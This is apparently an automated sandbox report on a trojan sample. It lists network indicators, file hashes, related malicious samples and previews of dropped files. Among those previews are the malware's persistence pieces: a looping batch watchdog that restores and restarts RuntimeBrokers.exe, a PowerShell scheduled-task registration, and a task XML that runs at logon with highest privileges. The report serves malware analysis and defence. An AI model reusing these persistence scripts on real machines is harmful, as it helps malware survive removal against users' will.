                                            https://ion=v4.5powershell.exe, 0000000E.00000002.201220974867.00000000085A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drfalse
                                                high
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000D.00000002.201200701612.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.201206447534.0000000006368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://update-xztodolist.cqttech.com/api/v1/update/checkRuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmpfalse
                                                        unknown
                                                        http://www.quovadis.bm0powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ocsp.quovadisoffshore.com0powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.201200701612.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.0000000004891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              43.250.172.42
                                                              unknownChina
                                                              62468VPSQUANUStrue
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1579418
                                                              Start date and time:2024-12-22 09:42:19 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 17m 25s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                              Run name:Suspected Instruction Hammering
                                                              Number of analysed new started processes analysed:50
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Fqae7BLq4m.exe
                                                              Detection:MAL
                                                              Classification:mal88.troj.evad.winEXE@101/44@0/1
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 51
                                                              • Number of non-executed functions: 54
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 9036 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 9104 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              TimeTypeDescription
                                                              03:45:16API Interceptor13120606x Sleep call for process: RuntimeBrokers.exe modified
                                                              No context
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              VPSQUANUS236236236.elfGet hashmaliciousUnknownBrowse
                                                              • 154.91.51.168
                                                              x.batGet hashmaliciousUnknownBrowse
                                                              • 103.230.121.81
                                                              product.batGet hashmaliciousUnknownBrowse
                                                              • 103.230.121.81
                                                              test.exeGet hashmaliciousUnknownBrowse
                                                              • 103.230.121.81
                                                              Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                                              • 103.230.121.81
                                                              rebirth.dbg.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 103.252.20.25
                                                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 103.122.177.128
                                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 154.91.52.33
                                                              file.exeGet hashmaliciousXWormBrowse
                                                              • 103.230.121.124
                                                              file.exeGet hashmaliciousXWormBrowse
                                                              • 103.230.121.124
                                                              No context
                                                              No context
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:XML 1.0 document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):1893
                                                              Entropy (8bit):5.212287775015203
                                                              Encrypted:false
                                                              SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                              MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                              SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                              SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                              SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2290968
                                                              Entropy (8bit):6.605466206867334
                                                              Encrypted:false
                                                              SSDEEP:49152:AWc2Dj3hktNUysuFDbfes+p9bZuR6c3ne3EQBSeoyWF2:Vc2Dj3hkHRsuFP2s+pvuR6c3nKEQBSeD
                                                              MD5:DC10EC7E14FF2DE831C6A08BBA41AD88
                                                              SHA1:56B5E56DA9F3346E4AEE57FB3E29286AFA792F0E
                                                              SHA-256:03ED8F64CDCA65B75F8ACC23EBA7CBBDF1BF2B7446159F07A909CE65BDD553EC
                                                              SHA-512:DB3081C52AA19D8E6E873D532D293D34F83B215F930C11A0A8B99A13D0D5D6966D83EAD1D2AC0C8AA1F480BEFC9B6274B9560A30163276AE1FBD8C40862EC117
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....eg...........!.........<.......!.......................................`#...........@............................0.......h..... ..H............"..)... !..0...........................b......P................................................text...m........................... ..`.rdata..._.......`..................@..@.data...@..... ..^..................@....00cfg........ ......N .............@..@.tls.......... ......P .............@....rsrc....H.... ..H...R .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):777816
                                                              Entropy (8bit):6.621348016864403
                                                              Encrypted:false
                                                              SSDEEP:12288:hEj1aAa/zgWDTuE8jegvwIDMuecTenORuFjBw7oHOSgmskduZnTKVrdMujyE3e+0:ooBCoH3BdoTKxdLyAZXdOEvnBzLRUFgi
                                                              MD5:30A274E00DA842B09E9763F19777ADED
                                                              SHA1:848C6A9348020EAEEC1A5674990683A1D9977B80
                                                              SHA-256:9E65D0E8A1BE49EDE20AD53EE1CF57696C99A28D1B058A185818B58B7FD83F66
                                                              SHA-512:81DED3C48D3FFDCF82952922C4B70D5F0945B1B0D5E178A1B552C7D5E8F39D00D3E007D161A7AFBA4502CC5CB2E92DF973902D94C28DF2DE5176FD2F50DE036A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........a............b......b.......b.................................,.................................................Rich............................PE..L.....Wg.........................................@.................................l.....@..........................................p..0...............X(.......{.. (..p...................0).......(..@............................................text............................... ..`.rdata..............................@..@.data....P.......:..................@....rsrc...0....p.......4..............@..@.reloc...{.......|...:..............@..B................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):788
                                                              Entropy (8bit):5.10946826685498
                                                              Encrypted:false
                                                              SSDEEP:24:NFW/WcuW/WcuWEAzWcyMZKx31SIYaYZLZ6y:NFVcuVcujAzzZKx31SIYN/6y
                                                              MD5:B8422B84DA3F3E791EAB8621899B55D1
                                                              SHA1:0214A135F224C150852D30FE9CA743585C9BB57B
                                                              SHA-256:565D247FC0F778E67EE20EC635E815D19A12DEB5FEFEC94F11274956B44C3627
                                                              SHA-512:D151F620777C5B67056A6CFEE0A88278B2E5FB9AD57DCDD80F2DFF75A801D63EBDDD6D0C74BEDAB8CBF9E8BA152EB7913F2790720AD4B73490ECD250789E7F18
                                                              Malicious:false
                                                              Preview:@echo off..:CheckProcess..set "ProcessName=RuntimeBrokers.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\libcurl.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):4
                                                              Entropy (8bit):0.8112781244591328
                                                              Encrypted:false
                                                              SSDEEP:3:5d:D
                                                              MD5:24368C745DE15B3D2D6279667DEBCBA3
                                                              SHA1:D0ADCA5766279A11DD1B0B6F88B39503DF90BF5A
                                                              SHA-256:0572F0F48C9D4DA7F59CCFFF270DF8A46297128F367248C5319FFE5B16E2F3AD
                                                              SHA-512:513D1068EF0078AFDE03FE1F3160DC6168C916425C8009235062F708C62152CEDB2FFFB53F82F9E5725443CBBC7DCD1844CF8C7DCE6E259067E8AD41E727CD3B
                                                              Malicious:false
                                                              Preview:8848
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):151
                                                              Entropy (8bit):4.741657013789009
                                                              Encrypted:false
                                                              SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                              MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                              SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                              SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                              SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                              Malicious:true
                                                              Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                              Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Dec 22 07:44:33 2024, mtime=Sun Dec 22 07:44:36 2024, atime=Tue Dec 3 12:11:47 2024, length=68284584, window=hide
                                                              Category:dropped
                                                              Size (bytes):1106
                                                              Entropy (8bit):4.681658757507972
                                                              Encrypted:false
                                                              SSDEEP:12:82mXu0U4I9/ZcCHqXTIRIGACmqsWw+L7FDtYjA1XJIKGjF0av2kEwhv4t2YCBToo:82m8RMjNfNWwkxDyA15sdv2kEKJTvm
                                                              MD5:666D6D8A8029853F07E16ED005EBEF49
                                                              SHA1:883359574847F56BE6B05BCA420EE6B4F32B4AE7
                                                              SHA-256:A14D7B11A24A37AF7CE3FB67183FECFEDBC5C4948EB1A958E07E31106CA2717F
                                                              SHA-512:642EFE1F6446C5930B461FF0AB879082ED5AB18F940DB624E2C5A302E3772E341B8CC39CE0169E97C343775BC07F06D696EB378E06E1170DCE8906C87137C99B
                                                              Malicious:false
                                                              Preview:L..................F.... ...\.*.MT....>.MT......E...............................P.O. .:i.....+00.../C:\...................x.1....."S...Users.d......OwH.Y.E.....u..............:.......8.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Y.E..Public..f......O.I.Y.E....Du..............<........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1......Y.E..Bilite..>......Y.E.Y.E....:.....&.................e.B.i.l.i.t.e.......2......Yxi .FIREFO~1.EXE..d......Y.E.Y.E.....Q....................1.).F.i.r.e.f.o.x. .S.e.t.u.p. .1.3.2...0...2...e.x.e......._...............-.......^.............B......C:\Users\Public\Bilite\Firefox Setup 132.0.2.exe..-.....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.F.i.r.e.f.o.x. .S.e.t.u.p. .1.3.2...0...2...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......609290..............n4UB.. .|..o>.x.....G.P..#.....n4UB.. .|..o>.x.....G.P..#.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2
                                                              Process:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              File Type:openssl enc'd data with salted password, base64 encoded
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):5.033214015923012
                                                              Encrypted:false
                                                              SSDEEP:3:iqk4fCxGrMbP0aCVot1SNGuD:ilcCxG+0aCVO1M
                                                              MD5:50E74B5BC067779E678DB0F2A54DEFC8
                                                              SHA1:13EA01C359FCAE743AC3486C6D3A327E56E63807
                                                              SHA-256:2EEF31B0CCD84C6A3385A75DCCF1F5EFB0285621DAAA4CDC08D04158B603DEAA
                                                              SHA-512:6EF7799A0391D8E9BA12BA937C4585C6C8A42A5C62250C5C8F0F6295043E2A3A587EA259A5C51F9CFD2141DA20878FCA8CE2B902F41624BC42C341D81D8AA40E
                                                              Malicious:false
                                                              Preview:U2FsdGVkX19kUlCThJUEb9e23b58qaUiAwjQjHvagtVU8kgm3zdqbwKdbKJmtEKf
                                                              Process:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):777816
                                                              Entropy (8bit):6.621348016864403
                                                              Encrypted:false
                                                              SSDEEP:12288:hEj1aAa/zgWDTuE8jegvwIDMuecTenORuFjBw7oHOSgmskduZnTKVrdMujyE3e+0:ooBCoH3BdoTKxdLyAZXdOEvnBzLRUFgi
                                                              MD5:30A274E00DA842B09E9763F19777ADED
                                                              SHA1:848C6A9348020EAEEC1A5674990683A1D9977B80
                                                              SHA-256:9E65D0E8A1BE49EDE20AD53EE1CF57696C99A28D1B058A185818B58B7FD83F66
                                                              SHA-512:81DED3C48D3FFDCF82952922C4B70D5F0945B1B0D5E178A1B552C7D5E8F39D00D3E007D161A7AFBA4502CC5CB2E92DF973902D94C28DF2DE5176FD2F50DE036A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........a............b......b.......b.................................,.................................................Rich............................PE..L.....Wg.........................................@.................................l.....@..........................................p..0...............X(.......{.. (..p...................0).......(..@............................................text............................... ..`.rdata..............................@..@.data....P.......:..................@....rsrc...0....p.......4..............@..@.reloc...{.......|...:..............@..B................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2290968
                                                              Entropy (8bit):6.605466206867334
                                                              Encrypted:false
                                                              SSDEEP:49152:AWc2Dj3hktNUysuFDbfes+p9bZuR6c3ne3EQBSeoyWF2:Vc2Dj3hkHRsuFP2s+pvuR6c3nKEQBSeD
                                                              MD5:DC10EC7E14FF2DE831C6A08BBA41AD88
                                                              SHA1:56B5E56DA9F3346E4AEE57FB3E29286AFA792F0E
                                                              SHA-256:03ED8F64CDCA65B75F8ACC23EBA7CBBDF1BF2B7446159F07A909CE65BDD553EC
                                                              SHA-512:DB3081C52AA19D8E6E873D532D293D34F83B215F930C11A0A8B99A13D0D5D6966D83EAD1D2AC0C8AA1F480BEFC9B6274B9560A30163276AE1FBD8C40862EC117
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....eg...........!.........<.......!.......................................`#...........@............................0.......h..... ..H............"..)... !..0...........................b......P................................................text...m........................... ..`.rdata..._.......`..................@..@.data...@..... ..^..................@....00cfg........ ......N .............@..@.tls.......... ......P .............@....rsrc....H.... ..H...R .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                              Category:dropped
                                                              Size (bytes):68284584
                                                              Entropy (8bit):7.999992371883463
                                                              Encrypted:true
                                                              SSDEEP:1572864:QHms4Lp3eKMWTi1hdM0C49TEX+tWBrhCJOfH:TNlfD46Xh
                                                              MD5:23F241F690F1F73A272EC524FB0537A7
                                                              SHA1:E9C8177734425D5A5544B6BD6BE6D5B4627E1FE1
                                                              SHA-256:F451E97BF0F25CC841366C190F62C8037577EC2EBC5A67DD524396559134F3B8
                                                              SHA-512:8E574C0069B8D3EBE8E43DFFA3DE6A9BECBFDF3681E88801D93FB81AD623490ECA7852DA933198E40F10BAB9E249D8E3509D0AC505575FC151D768E799F03957
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............`Y.`Y.`YM.nY.`Y&.dY.`Y..?Y.`Y..=Y.`Y.aYb.`Y&.jY.`Y&.kY..`Yv.fY.`YRich.`Y........................PE..L...9m.[.........................@...O...P...`....@..........................`.............................................L[.......`..L...........X...P5..................................................................0.......................UPX0.....@..............................UPX1.........P......................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                                                              Process:C:\Windows\SysWOW64\timeout.exe
                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                              Category:dropped
                                                              Size (bytes):172
                                                              Entropy (8bit):3.8842159555406113
                                                              Encrypted:false
                                                              SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2Htyst3g4t32vov:hYFRamFSQZ0lv5y/9JctESnQUq3tyMXZ
                                                              MD5:B44FC16E07912C24524F74A8D3C9BCED
                                                              SHA1:CCBA90D10D32BFF18221183C88146B378011CC3B
                                                              SHA-256:FA51D90457861D7169034A0D4122B3AFDA2B4C07E157A4C18AF06D833C96ED2A
                                                              SHA-512:1B9F0DD3387FDD1324828AA7CC94A98EC0344A5CAF1EDFFAAF7C0F98F134B09A4DCFD440E9374B0D3C80E099DFE43DABD838B0BE34C395C2F64C9334AE569516
                                                              Malicious:false
